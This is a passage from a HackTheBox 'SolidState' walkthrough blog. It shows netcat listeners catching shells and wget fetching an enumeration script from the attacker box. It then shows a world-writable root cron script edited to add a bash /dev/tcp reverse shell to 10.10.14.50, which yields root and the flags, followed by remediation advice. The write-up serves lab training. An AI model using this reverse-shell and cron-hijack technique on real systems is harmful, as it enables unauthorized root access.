-rbash: $'remoteAddrq~\002L': command not found

-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory

-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found

-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found

-rbash: @team.pl>

Message-ID: <11099374.0.1580672353999.JavaMail.root@solidstate>

MIME-Version: 1.0

Content-Type: text/plain; charset=us-ascii

Content-Transfer-Encoding: 7bit

Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost

Received: from 10.10.14.50 ([10.10.14.50])

          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 97

          for <../../../../../../../../etc/bash_completion.d@localhost>;

          Sun, 2 Feb 2020 14:39:13 -0500 (EST)

Date: Sun, 2 Feb 2020 14:39:13 -0500 (EST)

From: team@team.pl



: No such file or directory

-rbash: $'\r': command not found



Awesome, looks like it worked.

Checking our netcat listener to see if we got another shell, it looks like we did:


root@kali:~# nc -lvnp 43110

listening on [any] 43110 ...

connect to [10.10.14.50] from (UNKNOWN) [10.10.10.51] 59974

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ pwd

/home/mindy

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -al

total 28

drwxr-x--- 4 mindy mindy 4096 Sep  8  2017 .

drwxr-xr-x 4 root  root  4096 Aug 22  2017 ..

-rw-r--r-- 1 root  root     0 Aug 22  2017 .bash_history

-rw-r--r-- 1 root  root     0 Aug 22  2017 .bash_logout

-rw-r--r-- 1 root  root   338 Aug 22  2017 .bash_profile

-rw-r--r-- 1 root  root  1001 Aug 22  2017 .bashrc

drwxr-x--- 2 mindy mindy 4096 Aug 22  2017 bin

-rw------- 1 root  root     0 Aug 22  2017 .rhosts

-rw------- 1 root  root     0 Aug 22  2017 .shosts

drw------- 2 root  root  4096 Aug 22  2017 .ssh

-rw------- 1 mindy mindy   33 Sep  8  2017 user.txt

Awesome, looks like we can go ahead and grab the user flag.


${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt

w00tw00tgetr00t         #get your own flag ;)

 

Privilege Escalation

Let’s use the Linux Smart Enumeration script to use some automation to take out some of the privesc enumeration legwork out of it. You can find the script on github (and it’s linked on a few previous posts) if you don’t have it. Let’s go ahead and serve it over SimpleHTTP from our kali box, then see if we can wget the file on the target system.


root@kali:~# cd /recon/linux-smart-enumeration/

root@kali:/recon/linux-smart-enumeration# python -m SimpleHTTPServer 8080

Serving HTTP on 0.0.0.0 port 8080 ...



Then from the target system:


${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ which wget

which wget

/usr/bin/wget

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget http://10.10.14.50:8080/lse.sh

wget http://10.10.14.50:8080/lse.sh

--2020-02-02 16:09:35--  http://10.10.14.50:8080/lse.sh

Connecting to 10.10.14.50:8080... connected.

HTTP request sent, awaiting response... 200 OK

Length: 34316 (34K) [text/x-sh]

Saving to: ‘lse.sh’



     0K .......... .......... .......... ...                  100%  691K=0.05s



2020-02-02 16:09:35 (691 KB/s) - ‘lse.sh’ saved [34316/34316]



${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x lse.sh

chmod +x lse.sh

Now let’s give it a run:


${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./lse.sh  

./lse.sh

---

If you know the current user password, write it here for better results: P@55W0rd1!2@                            

---

                                                                                                                 

 LSE Version: 1.16                                                                                               



        User: mindy

     User ID: 1001

    Password: ******

        Home: /home/mindy

        Path: /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

       umask: 0022



    Hostname: solidstate

       Linux: 4.9.0-3-686-pae

Distribution: Debian GNU/Linux 9.0 (stretch)

Architecture: i686



==================================================================( users )=====

[i] usr000 Current user groups............................................. yes!

[*] usr010 Is current user in an administrative group?..................... nope

[*] usr020 Are there other users in an administrative groups?.............. nope

[*] usr030 Other users with shell.......................................... yes!

[i] usr040 Environment information......................................... skip

[i] usr050 Groups for other users.......................................... skip                                 

[i] usr060 Other users..................................................... skip                                 

[*] usr070 PATH variables defined inside /etc.............................. yes!                                 

[!] usr080 Is '.' in a PATH variable defined inside /etc?.................. nope

===================================================================( sudo )=====

[!] sud000 Can we sudo without a password?................................. nope

[!] sud010 Can we list sudo commands without a password?................... nope

[!] sud020 Can we sudo with a password?.................................... nope

[!] sud030 Can we list sudo commands with a password?...................... nope

[*] sud040 Can we read /etc/sudoers?....................................... nope

[*] sud050 Do we know if any other users used sudo?........................ nope

============================================================( file system )=====

[*] fst000 Writable files outside user's home.............................. yes!

[*] fst010 Binaries with setuid bit........................................ yes!

[!] fst020 Uncommon setuid binaries........................................ nope

[!] fst030 Can we write to any setuid binary?.............................. nope

[*] fst040 Binaries with setgid bit........................................ skip

[!] fst050 Uncommon setgid binaries........................................ skip                                 

[!] fst060 Can we write to any setgid binary?.............................. skip                                 

[*] fst070 Can we read /root?.............................................. nope                                 

[*] fst080 Can we read subdirectories under /home?......................... yes!

[*] fst090 SSH files in home directories................................... nope

[*] fst100 Useful binaries................................................. yes!

[*] fst110 Other interesting files in home directories..................... nope

[!] fst120 Are there any credentials in fstab/mtab?........................ nope

[*] fst130 Does 'mindy' have mail?......................................... nope

[!] fst140 Can we access other users mail?................................. nope

[*] fst150 Looking for GIT/SVN repositories................................ nope

[!] fst160 Can we write to critical files?................................. nope

[!] fst170 Can we write to critical directories?........................... nope

[!] fst180 Can we write to directories from PATH defined in /etc?.......... nope

[i] fst500 Files owned by user 'mindy'..................................... skip

[i] fst510 SSH files anywhere.............................................. skip                                 

[i] fst520 Check hosts.equiv file and its contents......................... skip                                 

[i] fst530 List NFS server shares.......................................... skip                                 

[i] fst540 Dump fstab file................................................. skip                                 

=================================================================( system )=====                                 

[i] sys000 Who is logged in................................................ skip

[i] sys010 Last logged in users............................................ skip                                 

[!] sys020 Does the /etc/passwd have hashes?............................... nope                                 

[!] sys030 Can we read /etc/shadow file?................................... nope

[!] sys030 Can we read /etc/shadow- file?.................................. nope

[!] sys030 Can we read /etc/shadow~ file?.................................. nope

[!] sys030 Can we read /etc/master.passwd file?............................ nope

[*] sys040 Check for other superuser accounts.............................. nope

[*] sys050 Can root user log in via SSH?................................... yes!

[i] sys060 List available shells........................................... skip

[i] sys070 System umask in /etc/login.defs................................. skip                                 

[i] sys080 System password policies in /etc/login.defs..................... skip                                 

===============================================================( security )=====                                 

[*] sec000 Is SELinux present?............................................. nope

[*] sec010 List files with capabilities.................................... yes!

[!] sec020 Can we write to a binary with caps?............................. nope

[!] sec030 Do we have all caps in any binary?.............................. nope

[*] sec040 Users with associated capabilities.............................. nope

[!] sec050 Does current user have capabilities?............................ skip

========================================================( recurrent tasks )=====                                 

[*] ret000 User crontab.................................................... nope

[!] ret010 Cron tasks writable by user..................................... nope

[*] ret020 Cron jobs....................................................... yes!

[*] ret030 Can we read user crontabs....................................... nope

[*] ret040 Can we list other user cron tasks?.............................. nope

[*] ret050 Can we write to any paths present in cron jobs.................. yes!

[!] ret060 Can we write to executable paths present in cron jobs........... nope

[i] ret400 Cron files...................................................... skip

[*] ret500 User systemd timers............................................. nope                                 

[!] ret510 Can we write in any system timer?............................... nope

[i] ret900 Systemd timers.................................................. skip

================================================================( network )=====                                 

[*] net000 Services listening only on localhost............................ yes!

[!] net010 Can we sniff traffic with tcpdump?.............................. nope

[i] net500 NIC and IP information.......................................... skip

[i] net510 Routing table................................................... skip                                 

[i] net520 ARP table....................................................... skip                                 

[i] net530 Namerservers.................................................... skip                                 

[i] net540 Systemd Nameservers............................................. skip                                 

[i] net550 Listening TCP................................................... skip                                 

[i] net560 Listening UDP................................................... skip                                 

===============================================================( services )=====                                 

[!] srv000 Can we write in service files?.................................. nope

[!] srv010 Can we write in binaries executed by services?.................. nope

[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope

[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope

[*] srv040 Upstart files not belonging to root............................. nope

[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope

[i] srv400 Contents of /etc/inetd.conf..................................... skip

[i] srv410 Contents of /etc/xinetd.conf.................................... skip                                 

[i] srv420 List /etc/xinetd.d if used...................................... skip                                 

[i] srv430 List /etc/init.d/ permissions................................... skip                                 

[i] srv440 List /etc/rc.d/init.d permissions............................... skip                                 

[i] srv450 List /usr/local/etc/rc.d permissions............................ skip                                 

[i] srv460 List /etc/init/ permissions..................................... skip                                 

[!] srv500 Can we write in systemd service files?.......................... nope                                 

[!] srv510 Can we write in binaries executed by systemd services?.......... nope

[*] srv520 Systemd files not belonging to root............................. nope

[i] srv900 Systemd config files permissions................................ skip

==============================================================( processes )=====                                 

[!] pro000 Can we write in any process binary?............................. nope

[*] pro010 Processes running with root permissions......................... yes!

[i] pro500 Running processes............................................... skip

[i] pro510 Running process binaries and permissions........................ skip                                 

===============================================================( software )=====                                 

[!] sof000 Can we connect to MySQL with root/root credentials?............. nope

[!] sof010 Can we connect to MySQL as root without password?............... nope

[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope

[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope

[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope

[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope

[*] sof030 Installed apache modules........................................ yes!

[!] sof040 Found any .htpasswd files?...................................... nope

[i] sof500 Sudo version.................................................... skip

[i] sof510 MySQL version................................................... skip                                 

[i] sof520 Postgres version................................................ skip                                 

[i] sof530 Apache version.................................................. skip                                 

=============================================================( containers )=====                                 

[*] ctn000 Are we in a docker container?................................... nope

[*] ctn010 Is docker available?............................................ nope

[!] ctn020 Is the user a member of the 'docker' group?..................... nope

[*] ctn200 Are we in a lxc container?...................................... nope

[!] ctn210 Is the user a member of any lxc/lxd group?...................... nope



==================================( FINISHED )==================================

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ 



So there’s a bit to unpack here; looks like cron jobs might run a script, but we have no visibility to jobs that are not mindy’s, and she does not appear to have any running. The script does mention that we can write to paths executed by cronjobs, so that could be interesting. However, we’d need to know what path we’re looking for. Let’s see what writeable and executable files exist outside of mindy’s home directory. A run of find / -type f -perm -2 2>/dev/null yields a lot of results with /proc which likely isn’t very helpful, so let’s filter those out and run it again:


find / -type f -perm -2 2>/dev/null | grep -v proc

/opt/tmp.py

/sys/fs/cgroup/memory/cgroup.event_control

Let’s check out tmp.py real quick, to see if there’s anything useful there.


${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ls -ltr /opt/tmp.py

ls -ltr /opt/tmp.py

-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py

Looks like it’s executable, so that’s good. Looks like python is also on the server too, we can confirm with:


${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ which python

which python

/usr/bin/python

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ python -V

python -V

Python 2.7.13

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ 

OK, so in theory, we should be able to write to and run this file; it looks like it’s owned by root, but if we used a reverse shell inside the python script, it would likely just give us the same user shell back, as it doesn’t seem to have a setuid bit set for privileged execution, and we don’t have sudo installed on the system.

Let’s check the file out further, first:


${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cat /opt/tmp.py

cat /opt/tmp.py

#!/usr/bin/env python

import os

import sys

try:

     os.system('rm -r /tmp/* ')

except:

     sys.exit()



Interesting, it looks like the script is removing everything from /tmp. This seems like something you would have run as a cron job, if you wanted to clean /tmp every so often; the script doesn’t seem to have a timer function itself. It is possible however, that it could be run ad-hoc. We can test this though, by creating a file in /tmp (as it’s world-writeable) and seeing if it get’s removed.

Let’s try this:


touch /tmp/cron_test.dat && ls -ltr /tmp && sleep 60 && ls -ltr /tmp

We may have to adjust the time to sleep to be longer than a minute, maybe 3,5, 30, or even an hour. Let’s see first however, if any cron jobs are running every minute:


touch /tmp/cron_test.dat && ls -ltr /tmp && sleep 60 && ls -ltr /tmp

total 0

-rw-r--r-- 1 mindy mindy 0 Feb  2 16:35 cron_test.dat

total 0

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ 

After a minute, the script wakes up from sleep, runs the directory listing again, and what do you know, no files in /tmp anymore!

 

gaining a root shell

OK, so now we know there’s a cron job running on the system every minute executing /opt/tmp.py. While we know the file is owned by root, we’re not 100% if the file is being executed by root (vs another account on the system running a cron job), but let’s go ahead and added a statement in the python file to spawn another reverse shell, and see. So let’s edit the python script to look like this:


#!/usr/bin/env python

import os

import sys

try:

    os.system('rm -r /tmp/* ')



    os.system('bash -c "bash -i >& /dev/tcp/10.10.14.50/1234 0>&1"')

except:

     sys.exit()



OK, let’s start another listener locally on kali with nc -lvnp 1234 and see if the reverse shell catches:


root@kali:/writeups/HTB/solidstate/exploits# nc -lvnp 1234

listening on [any] 1234 ...

connect to [10.10.14.50] from (UNKNOWN) [10.10.10.51] 55726

bash: cannot set terminal process group (5618): Inappropriate ioctl for device

bash: no job control in this shell

root@solidstate:~# 

After a moment, looks like we got a root shell, awesome! So this confirms the cron job was indeed running as root.

We can go ahead and grab the root flag and call it a day.


root@solidstate:~# id && date && ls -ltr

id && date && ls -ltr

uid=0(root) gid=0(root) groups=0(root)

Sun Feb  2 16:55:19 EST 2020

total 4

-rw------- 1 root root 33 Aug 22  2017 root.txt

root@solidstate:~# cat root.txt

cat root.txt

{thisflagsminemeow}

 

 

Conclusion

 

  • The James Remote Administration service credentials should be changed from their defaults to something more secure

  • The James Remote Administration service should be patched to mitigate known exploits for that version of the service

  • Passwords for users should be given out-of-band (not email, maybe in-person, or another medium), if possible. The system should also be configured to immediately prompt the user to change their password on first login.

  • File permissions and cron job permissions should be asessed and addressed as needed. a possible solution would be to restrict permissions on the file executed by the cron job; if it really needs to be ran as root, it is probably best to have a 700 chmod on the python script, that way there is no visiblity to what the file is doing, nor any editing capabilities to an outside user

 

Personal takeaways

  • get more comfortable reading and understanding exploits. If there is some confusion on what the exploit is actually doing, I should take more time to understand what it’s trying to do and how it behaves, before jumping to trying to get the exploit to trigger

 

 

All for now; until next time.

~@initinfosec

hackthebox, HTB, writeups, walkthrough, hacking, pentest, OSCP prep
comments powered by Disqus